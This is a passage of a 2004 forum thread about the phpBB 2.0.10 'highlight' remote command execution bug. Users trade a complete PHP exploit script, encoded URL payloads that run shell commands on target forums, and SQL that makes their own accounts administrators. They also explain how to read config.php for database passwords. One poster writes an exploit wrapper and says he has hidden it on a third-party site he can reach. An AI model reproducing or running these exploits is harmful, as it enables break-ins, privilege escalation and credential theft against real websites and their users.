|
Menu |
|
|
Home |
| |
|
Discussions |
| |
|
Tools |
| |
|
Affiliates |
| |
|
Content |
| |
|
Info |
| | |
|
|
|
|
|
User Info |
|
Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9144
People Online:
Visitors: 106
Members: 0
Total: 106
|
|
|
|
|
|
Full disclosure |
|
|
|
|
|
|
|
|
|
IT Security and Insecurity Portal |
|
|
Re: a |
|
Posted: Tue Nov 23, 2004 5:23 pm |
|
|
LINUX |
Moderator |
|
|
Joined: May 24, 2004 |
Posts: 404 |
Location: Caiman |
|
|
|
|
|
|
SteX wrote: | What did you entered in SQL tab..? |
i not use sql, i test CMD commands work 100% |
|
|
|
|
Posted: Tue Nov 23, 2004 9:20 pm |
|
|
Yomane |
Regular user |
|
|
Joined: Nov 23, 2004 |
Posts: 8 |
|
|
|
|
|
|
|
But can we execute sql query with mysql_query ? Because I try it and it doesn't work ?!
Like this example:
Code: | &highlight=%2527.$poster=mysql_query(INSERT INTO phpbb_users VALUES %2910%2C1%2C"test"%2C"098f6bcd4621d373cade4e832627b4f6"%2C0%2C0%2C0%2C0%2C1%2C0%2C0%2C1%2CNULL%2C"d M Y H:i"%2C0%2C0%2C0%2CNULL%2CNULL%2CNULL%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2CNULL%2C0%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%29).%2527 |
And it's not supposed to work ? |
|
Last edited by Yomane on Fri Nov 26, 2004 1:23 am; edited 3 times in total |
|
|
|
Posted: Tue Nov 23, 2004 9:49 pm |
|
|
SteX |
Advanced user |
|
|
Joined: May 18, 2004 |
Posts: 181 |
Location: Serbia |
|
|
|
|
|
|
waraxe ,where are you |
|
_________________
We would change the world, but God won't give us the sourcecode...
....Watch the master. Follow the master. Be the master....
------------------------------------------------------- |
|
|
|
|
getting admin |
|
Posted: Wed Nov 24, 2004 7:41 pm |
|
|
ReFleX |
Active user |
|
|
Joined: Nov 05, 2004 |
Posts: 39 |
Location: ARGENTINA! |
|
|
|
|
|
|
I were playing around with this. I look that there are pepople asking to get admin hashes. With the Sql injection in this exploit (mysql_query()) you can give your self admin.
Just Register a new user, Get the UID of your new user (you can see it in memberlist in the link of your user &u=xxxx )
Then go to the exploit and complete de boxes (in the bottom part) And in SQL put this
Code: |
UPDATE phpbb_users SET user_level=1 WHERE user_id=xxx
|
where xxx is YOUR UID
Then loggin and you have admin.
If you havent maybe the prefix of mysql tables are diferents of "phpbb_"
You can see the prefix in the config.php file. So with de system() exploit you can get that file very easy (cat <path>/config.php)
So there You have admin
Also try the password of mysqlUser... so people (A LOT) use the same password for theirs ftps, cpanels, shells, etc etc
Ok, hope this help someone
and sorry about my bad english |
|
|
|
|
|
|
|
|
Posted: Wed Nov 24, 2004 7:56 pm |
|
|
Yomane |
Regular user |
|
|
Joined: Nov 23, 2004 |
Posts: 8 |
|
|
|
|
|
|
|
Thank you ReFleX, but I image that is possible to do it without the exploit program on howdark.com no ?!? |
|
|
|
|
Posted: Wed Nov 24, 2004 8:56 pm |
|
|
jessica |
Regular user |
|
|
Joined: Sep 18, 2004 |
Posts: 5 |
|
|
|
|
|
|
|
I took all of it down, it's gone.
I never got mysql_query to work, but the theoritically it should have, I never gave it much testing. |
|
|
|
|
Posted: Wed Nov 24, 2004 9:31 pm |
|
|
SteX |
Advanced user |
|
|
Joined: May 18, 2004 |
Posts: 181 |
Location: Serbia |
|
|
|
|
|
|
Whats happened with howdark.com ..
Is there any similar "exploit" site,or somebody have backup od "exploit" page ??? |
|
_________________
We would change the world, but God won't give us the sourcecode...
....Watch the master. Follow the master. Be the master....
------------------------------------------------------- |
|
|
|
|
ok |
|
Posted: Wed Nov 24, 2004 11:39 pm |
|
|
ReFleX |
Active user |
|
|
Joined: Nov 05, 2004 |
Posts: 39 |
Location: ARGENTINA! |
|
|
|
|
|
|
ouch.... howdark is gone.... i hope it's gone for a while. I try to make it manualy but I cant do it, I dont have any guide to do it, the only one that I make to work is
Code: |
viewtopic.php?t=13&highlight=%2527%252esystem(l%252es)%252e%2527
|
It make an ls I'll keep trying I post any news i found.
If someone know how to make this exploit manualy post the way it's and an explaniation of this. |
|
|
|
|
|
|
|
|
Posted: Thu Nov 25, 2004 2:07 pm |
|
|
SteX |
Advanced user |
|
|
Joined: May 18, 2004 |
Posts: 181 |
Location: Serbia |
|
|
|
|
|
|
I Found it..
But almost 99% of hosts dont have curl extension...
Code: | #!/usr/bin/php -q
<?php
/*
# phpBB 2.0.10 execute command by pokleyzz <pokleyzz at scan-associates.net>
# 15th November 2004 : 4:04 a.m
#
# bug found by How Dark (http://www.howdark.com) (1st October 2004)
#
# Requirement:
#
# PHP 4.x with curl extension;
#
# ** Selamat Hari Raya **
*/
if (!(function_exists('curl_init'))) {
echo "cURL extension required\n";
exit;
}
if ($argv[2]){
$url = $argv[1];
$command = $argv[2];
}
else {
echo "Usage: ".$argv[0]." <URL> <command> [topic id] [proxy]\n\n";
echo "\tURL\t URL to phpnBB site (ex: http://127.0.0.1/html)\n";
echo "\tcommand\t command to execute on server (ex: 'ls -la')\n";
echo "\ttopic_id\t topic id\n";
echo "\tproxy\t optional proxy url (ex: http://10.10.10.10:8080)\n";
exit;
}
if ($argv[3])
$topic = $argv[3];
else
$topic = 1;
if ($argv[4])
$proxy = $argv[4];
$cmd = str2chr($command);
$action = "/viewtopic.php?t=$topic&highlight=%2527%252esystem(".$cmd.")%252e%2527";
$ch=curl_init();
if ($proxy){
curl_setopt($ch, CURLOPT_PROXY,$proxy);
}
curl_setopt($ch, CURLOPT_URL,$url.$action);
curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
$res=curl_exec ($ch);
curl_close ($ch);
echo $res;
function str2chr($str){
for($i = 0;$i < strlen($str);$i++){
$chr .= "chr(".ord($str{$i}).")";
if ($i != strlen($str) -1)
$chr .= "%252e";
}
return $chr;
}
?> |
|
|
_________________
We would change the world, but God won't give us the sourcecode...
....Watch the master. Follow the master. Be the master....
------------------------------------------------------- |
|
|
|
|
|
|
|
Posted: Thu Nov 25, 2004 2:12 pm |
|
|
hebe |
Advanced user |
|
|
Joined: Sep 04, 2004 |
Posts: 59 |
|
|
|
|
|
|
|
yes
how can we drop all tables or inject a new admin hash |
|
|
|
|
|
|
|
|
Posted: Fri Nov 26, 2004 8:23 am |
|
|
DeNKo |
Beginner |
|
|
Joined: Nov 26, 2004 |
Posts: 1 |
|
|
|
|
|
|
|
First, excuse me if you don't understand me because my english isn't too good.
I've been testing this bug and searching a way to inject sql code. A little time later, I think I've "discovered" a good way..
If we know the database host,user,pass and name.. Why we dont try to execute mysql with those parameters to inject sql code?
Example:
We have a phpbb forum which it connects to the next database:
$dbhost=localhost
$dbname=victim_phpbb
$dbuser=victim_forum
$dbpass=aeiou
I'm using this method to execute shell commands..
/viewtopic.php?t=236&highlight=%2527.$poster=%60$ls%60.%2527&ls=[command]
There isn't any unusual think, we use $ls to ask for the shell command later with the &ls= parameter.
Now, using the database example, we can use victim's mysql client to connect to the database and inject sql code..
If we had a shell, we could inject sql code with a unique commandline:
mysql -h localhost -u victim_forum --password=aeiou -D=victim_phpbb -e "UPDATE phpbb_users SET user_level=1 WHERE user_id=XXX"
If we want to do it using the bug, we should type something like this:
/viewtopic.php?t=236&highlight=%2527.$poster=%60$ls%60.%2527&ls=mysql%20-h%20localhost%20-u%20victim_forum%20--password=aeiou%20-D=victim_phpbb%20-e%20"UPDATE%20phpbb_users%20SET%20user_level=1%20WHERE%20user_id=100"
"-e" modificator is the one which allow us to execute a sql query
After that, we have admin privileges in our account . We can check it using the sql query: SELECT user_level WHERE user_id=xxx
I hope it could help you... |
|
|
|
|
|
|
please |
|
Posted: Fri Nov 26, 2004 12:01 pm |
|
|
talmo11 |
Beginner |
|
|
Joined: Nov 06, 2004 |
Posts: 2 |
|
|
|
|
|
|
|
|
Last edited by talmo11 on Fri Nov 26, 2004 4:43 pm; edited 1 time in total |
|
|
|
|
Testing... |
|
Posted: Fri Nov 26, 2004 12:03 pm |
|
|
ReFleX |
Active user |
|
|
Joined: Nov 05, 2004 |
Posts: 39 |
Location: ARGENTINA! |
|
|
|
|
|
|
Stex... I'll test this php script now, if it works fine We maybe could change it To work un HTTP mode so we can upload ir in some servers were i have access.
ok!... lets work |
|
|
|
|
|
OKEY! |
|
Posted: Fri Nov 26, 2004 12:51 pm |
|
|
ReFleX |
Active user |
|
|
Joined: Nov 05, 2004 |
Posts: 39 |
Location: ARGENTINA! |
|
|
|
|
|
|
OKEY guys it make it!... Now we have to upload it, I have a few pages were i have access... maybe we can hide it there
But first I post the code so anyone can see it and tell if something is wrong. I dont test de sql injection but I thing it works
Code: |
<?
/*
# Create by ReFleX
#
# Function str2chr by ** Selamat Hari Raya **
#
*/
$url = $_POST['url'];
$cmd = $_POST['cmd'];
$topic = $_POST['topicid'];
$a = $_GET['a'];
$cmd = str2chr($cmd);
if($a==1)
$getvars = "/viewtopic.php?t=$topic&highlight=%2527%252esystem(".$cmd.")%252e%2527";
else
$getvars = "/viewtopic.php?t=$topic&highlight=%2527%252emysql_query(".$cmd.")%252e%2527";
$fullurl = $url . $getvars;
if(isset($a))
header("Location: $fullurl");
else
echo "<b>Created by ReFleX</b>";
function str2chr($str){
for($i = 0;$i < strlen($str);$i++){
$chr .= "chr(".ord($str{$i}).")";
if ($i != strlen($str) -1)
$chr .= "%252e";
}
return $chr;
}
?>
|
I use the function str2chr of the script that stex post |
|
|
|
|
|
|
Uploading... |
|
Posted: Fri Nov 26, 2004 1:00 pm |
|
|
ReFleX |
Active user |
|
|
Joined: Nov 05, 2004 |
Posts: 39 |
Location: ARGENTINA! |
|
|
|
|
|
|
Okey, here I put the script
http://www.sururufitness.com/2bgal/stat/lang/
It's hide....
Its = to the other script of howdark The same face So just test it, I will upload it o other servers so we can have alternatives
I've to work so in a few hour I make a tar with all the files of the exploit together
|
|
|
|
|
www.waraxe.us Forum Index -> PhpBB
You cannot post new topics in this forum You cannot reply to topics in this forum You cannot edit your posts in this forum You cannot delete your posts in this forum You cannot vote in polls in this forum
|
All times are GMT
Page 2 of 4
Goto page Previous1, 2, 3, 4Next
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|
|